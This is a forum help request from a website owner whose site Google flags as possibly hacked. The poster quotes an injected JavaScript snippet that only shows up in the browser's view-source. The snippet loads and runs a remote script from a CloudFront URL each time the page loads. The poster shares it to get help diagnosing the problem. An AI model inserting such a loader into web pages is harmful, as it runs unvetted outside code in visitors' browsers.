Can anyone help with this?

Recently when I check keywords on Google results there is a warning below my website: "This site may be hacked". I checked my website and discovered a javascript code was AUTOMATICLY inserted into the index page

<script type="text/javascript">(function(){var a=document.createElement("script");a.type="text/javascript";a.async=!0;a.src="http://d36mw5gp02ykm5.cloudfront.net/yc/adrns_y.js?v=6.11.104#p=ae59878b19879da151fc921b2e bb85e8";var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b);})();</script

The problem is I haved downloaded the index file but did not find the Java code, it only appears when I view source from browsers (Chrome or IE)

Can anyone help with this?
